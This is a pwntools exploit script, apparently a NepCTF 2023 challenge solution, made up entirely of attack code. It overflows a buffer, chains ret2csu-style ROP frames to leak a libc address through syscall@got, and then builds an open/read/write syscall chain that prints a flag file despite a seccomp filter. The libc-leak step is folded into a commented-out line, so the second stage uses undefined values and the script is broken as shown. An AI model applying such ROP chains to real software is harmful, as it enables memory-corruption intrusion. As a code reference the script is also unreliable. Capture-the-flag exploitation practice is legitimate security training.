from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'  # every byte sent/received is echoed to the terminal

# Fixed addresses inside the target binary (0x40xxxx/0x60xxxx values, so
# presumably a non-PIE build). They are copied from the original script and
# are not re-derived here.
power_rop1 = 0x0000000000400806
power_rop2 = 0x00000000004007F0
buf_inp = 0x0000000000601039
pop_rbp = 0x0000000000400628
bss_addr = 0x0000000000601050  # assigned but not referenced anywhere else in this script


def getpower(avg1, avg2, avg3, got):
    """Return one frame for the power_rop1 / power_rop2 gadget pair.

    The frame is laid out as: power_rop1, seven qwords
    (0, 0, 1, got, avg1, avg2, avg3), power_rop2, then seven zero qwords of
    filler. The original author's note explains the filler count: although
    the gadget following power_rop2 only has six pops, it also does an
    rsp+8, so seven qwords are consumed. This looks like the usual
    __libc_csu_init register-loading pair (rbx/rbp/r12..r15 followed by a
    call through [r12 + rbx*8]) -- presumably ``got`` is the GOT slot that
    gets called and avg1..avg3 end up in rdi/rsi/rdx -- but that is not
    verified against the binary here.

    Args:
        avg1, avg2, avg3: integers placed in the frame after ``got``.
        got: integer address placed in the slot before avg1.

    Returns:
        bytes: the packed frame, ready to be appended to a chain.
    """
    register_slots = [0, 0, 1, got, avg1, avg2, avg3]
    filler = [0] * 7  # one rsp+8 skip plus six pops, per the author's note
    words = [power_rop1, *register_slots, power_rop2, *filler]
    return b''.join(p64(w) for w in words)
# Target selection: a local copy is used; the remote endpoints the author
# tried are kept below, disabled.
# p=process('./pwn')
p=process('../出题/pwn3/pwn')
# p=remote('162.14.104.152','10017')
# p=remote('nepctf.1cepeak.cn','31507')

elf=ELF('pwn')
libc=ELF('./libc-2.27.so')  # every libc-relative offset later in the script assumes exactly this build
syscall_got=elf.got['syscall']
seccomp_init_got=elf.symbols['seccomp_init']  # resolved but never used; the symbol's presence is the only hint in this script that the binary installs a seccomp filter
# pause()
# gdb.attach(p,'b *0x000000000040078D')
# pause()

# Stage 1: send the first chain. 0x30 bytes of filler (the string 'flag'
# NUL-padded to 8 bytes, six times -- the 0x30 comes from the challenge and
# is not derived here), then 0x4007b0, presumably the slot holding the saved
# return address.
payload=b'flag\x00\x00\x00\x00'*(0x30//8)+p64(0x4007b0)
payload+=getpower(0,0,buf_inp,syscall_got)  # frame 1: dispatch through syscall@got with (0, 0, buf_inp)
# payload+=getpower(buf_inp,0,0,syscall_got)
payload+=getpower(1,1,syscall_got,syscall_got)  # frame 2: dispatch through syscall@got with (1, 1, syscall_got)
payload+=p64(pop_rbp)+p64(buf_inp+8)  # rbp := buf_inp+8 before jumping to the final address
# payload+=getpower(0,0,buf_inp+0x10,syscall_got)
# payload+=getpower(1,syscall_got,0x20,syscall_got)
# payload+=p64(elf.symbols['__libc_start_main'])
payload+=p64(0x000000000040076D)  # both chains in this script end here; the role of this in-binary address is not visible from the script
# payload+=getpower(buf_inp,0,2,syscall_got)
# payload+=getpower(3,buf_inp+0x6,0x30,syscall_got)
# payload+=getpower(1,buf_inp+0x6,0x30,syscall_got)
p.sendlineafter(b'!!!\n',payload)  # wait for the banner line ending in '!!!', then send the chain
# p.sendlineafter(b'NepCTF2023!\n',payload)
pause()  # blocks until a key is pressed -- a manual breakpoint for attaching a debugger
# Second line: 'flag' NUL-padded plus the address 0x601000. Presumably consumed
# by a read that frame 1 above performs into buf_inp (inferred from frame 1's
# arguments, not verified here).
p.sendline(b'flag\x00\x00\x00\x00'+p64(0x601000))
# pause()

# Earlier, disabled variant of stage 1:
# payload=b'a'*0x30+p64(0x4007b0)
# payload+=getpower(1,1,syscall_got,syscall_got)
# payload+=p64(0x000000000040076D)
# p.sendlineafter(b'NepCTF2023!\n',payload)
# pause() # # p.sendline(b'')# 控制rax为1 # # # 接收libc recvaddr=p.recvuntil(b'\x7f') sysaddr=u64(recvaddr[-6:].ljust(8,b'\x00')) print(hex(sysaddr)) libcbase=sysaddr-libc.symbols['syscall'] print('libcbase',hex(libcbase))
# Stage 2 gadgets. The raw offsets added to libcbase are specific to the
# libc-2.27.so build loaded above (any other build invalidates them);
# pop_rdi is inside the binary itself. The names are the author's and the
# pop order they imply (e.g. rdx then rsi) is not verified here.
pop_rax=libcbase+0x000000000001b500
open_addr=libcbase+libc.symbols['open']  # resolved but only referenced in disabled lines below
read_addr=libcbase+libc.symbols['read']  # unused
write_addr=libcbase+libc.symbols['write']  # unused
pop_rdi=0x0000000000400813
pop_rdx_rsi=libcbase+0x0000000000130539
pop_rsp=libcbase+0x000000000000396c  # unused
pop_rcx=libcbase+0x00000000000e433e

# Stage 2 chain: same 0x30 filler + 0x4007b0 as stage 1, then three raw
# syscalls entered via sysaddr+23 (presumably the syscall instruction inside
# libc's syscall() plus its return path -- not verified here). The rax values
# 2 / 0 / 1 are the x86-64 open / read / write syscall numbers.
payload=b'flag\x00\x00\x00\x00'*(0x30//8)+p64(0x4007b0)
payload+=p64(pop_rax)+p64(2)+p64(pop_rcx)+p64(0)  # rax=2, rcx=0
# payload+=getpower(buf_inp,0,0,syscall_got)
payload+=flat([pop_rdi,buf_inp,pop_rdx_rsi,0,0,pop_rbp,buf_inp+0x30,sysaddr+23])  # open(buf_inp, 0, 0), with rbp := buf_inp+0x30 first
payload+=p64(pop_rax)+p64(0)  # rax=0
payload+=flat([pop_rdi,3,pop_rdx_rsi,0x30,buf_inp,sysaddr+23])  # read(3, buf_inp, 0x30); fd 3 assumes the open succeeded and no other descriptor was open
payload+=p64(pop_rax)+p64(1)  # rax=1
payload+=flat([pop_rdi,1,pop_rdx_rsi,0x30,buf_inp,sysaddr+23])  # write(1, buf_inp, 0x30)
# payload+=flat([pop_rdi,buf_inp-1,pop_rdx_rsi,0,0,open_addr])
# payload+=
payload+=p64(0x000000000040076D)  # same final in-binary address as stage 1
print('len',len(payload))  # chain length; the input size limit it has to fit is not visible from this script
# p.sendlineafter(b'NepCTF2023!\n',payload)
p.sendlineafter(b'!!!\n',payload)

# # pop_rax=libcbase+0x000000000001b500
# # payload2=

p.interactive()  # hand the connection to the terminal so the output of the chain can be read